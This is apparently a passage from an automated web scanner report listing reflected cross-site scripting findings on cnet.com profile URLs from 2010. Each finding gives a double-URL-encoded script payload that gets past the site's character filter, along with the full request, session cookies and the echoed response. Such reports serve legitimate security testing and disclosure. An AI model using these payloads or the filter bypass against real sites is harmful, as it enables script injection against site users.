Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/antuan.goodwinb00ce%253cscript%253ealert%25281%2529%253c%252fscript%253e4f125594f0d/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:05 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:05 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=989
Connection: Keep-Alive
Content-Length: 31126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>antuan.goodwinb00ce<script>alert(1)</script>4f125594f0d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3089b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96fecca6cf9 was submitted in the REST URL parameter 2. This input was echoed as 3089b"><script>alert(1)</script>96fecca6cf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/audiodonald3089b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96fecca6cf9/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:20 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:21 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=992
Connection: Keep-Alive
Content-Length: 31092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="audiodonald3089b"><script>alert(1)</script>96fecca6cf9"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4fc4c%253cscript%253ealert%25281%2529%253c%252fscript%253ec36086affe7 was submitted in the REST URL parameter 2. This input was echoed as 4fc4c<script>alert(1)</script>c36086affe7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/audiodonald4fc4c%253cscript%253ealert%25281%2529%253c%252fscript%253ec36086affe7/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:22 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:22 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=997
Connection: Keep-Alive
Content-Length: 31075
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>audiodonald4fc4c<script>alert(1)</script>c36086affe7's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 771bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1e615ab5f3 was submitted in the REST URL parameter 2. This input was echoed as 771bc"><script>alert(1)</script>c1e615ab5f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/bharwoodcbs771bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1e615ab5f3/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:32 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:32 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=967
Connection: Keep-Alive
Content-Length: 31098
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="bharwoodcbs771bc"><script>alert(1)</script>c1e615ab5f3"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7ee1%253cscript%253ealert%25281%2529%253c%252fscript%253e6123677fe01 was submitted in the REST URL parameter 2. This input was echoed as d7ee1<script>alert(1)</script>6123677fe01 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/bharwoodcbsd7ee1%253cscript%253ealert%25281%2529%253c%252fscript%253e6123677fe01/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:15:34 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:15:34 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Content-Length: 31105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>bharwoodcbsd7ee1<script>alert(1)</script>6123677fe01's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 58838%253cscript%253ealert%25281%2529%253c%252fscript%253e93d58fcfbc1 was submitted in the REST URL parameter 2. This input was echoed as 58838<script>alert(1)</script>93d58fcfbc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/bonnie.cha58838%253cscript%253ealert%25281%2529%253c%252fscript%253e93d58fcfbc1/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:31 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:31 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=989
Connection: Keep-Alive
Content-Length: 31046
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>bonnie.cha58838<script>alert(1)</script>93d58fcfbc1's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e9cd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e258cd4f45b7 was submitted in the REST URL parameter 2. This input was echoed as 7e9cd"><script>alert(1)</script>258cd4f45b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/bonnie.cha7e9cd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e258cd4f45b7/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:12:29 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:12:30 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=983
Connection: Keep-Alive
Content-Length: 31118
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="bonnie.cha7e9cd"><script>alert(1)</script>258cd4f45b7"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e964%253cscript%253ealert%25281%2529%253c%252fscript%253efb22b6abe35 was submitted in the REST URL parameter 2. This input was echoed as 9e964<script>alert(1)</script>fb22b6abe35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/briancnet9e964%253cscript%253ealert%25281%2529%253c%252fscript%253efb22b6abe35/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:13 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:13 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=943
Connection: Keep-Alive
Content-Length: 31036
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>briancnet9e964<script>alert(1)</script>fb22b6abe35's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3686b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b5c50c0a91 was submitted in the REST URL parameter 2. This input was echoed as 3686b"><script>alert(1)</script>8b5c50c0a91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/briancnet3686b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b5c50c0a91/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:10:12 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:10:12 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=958
Connection: Keep-Alive
Content-Length: 31148
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="briancnet3686b"><script>alert(1)</script>8b5c50c0a91"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb59c719187e was submitted in the REST URL parameter 2. This input was echoed as dd9cb"><script>alert(1)</script>b59c719187e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/candacelombardidd9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb59c719187e/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:47 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:47 GMT
Edge-Control: no-cache
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=938
Connection: Keep-Alive
Content-Length: 31206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="candacelombardidd9cb"><script>alert(1)</script>b59c719187e"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 45ac8%253cscript%253ealert%25281%2529%253c%252fscript%253e06a4f8a6680 was submitted in the REST URL parameter 2. This input was echoed as 45ac8<script>alert(1)</script>06a4f8a6680 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/candacelombardi45ac8%253cscript%253ealert%25281%2529%253c%252fscript%253e06a4f8a6680/ HTTP/1.1
Host: www.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 00:13:48 GMT
Content-Language: en
Expires: Wed, 17 Nov 2010 00:13:48 GMT
Edge-Control: no-cache
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: no-cache
Keep-Alive: timeout=15, max=972
Connection: Keep-Alive
Content-Length: 31174
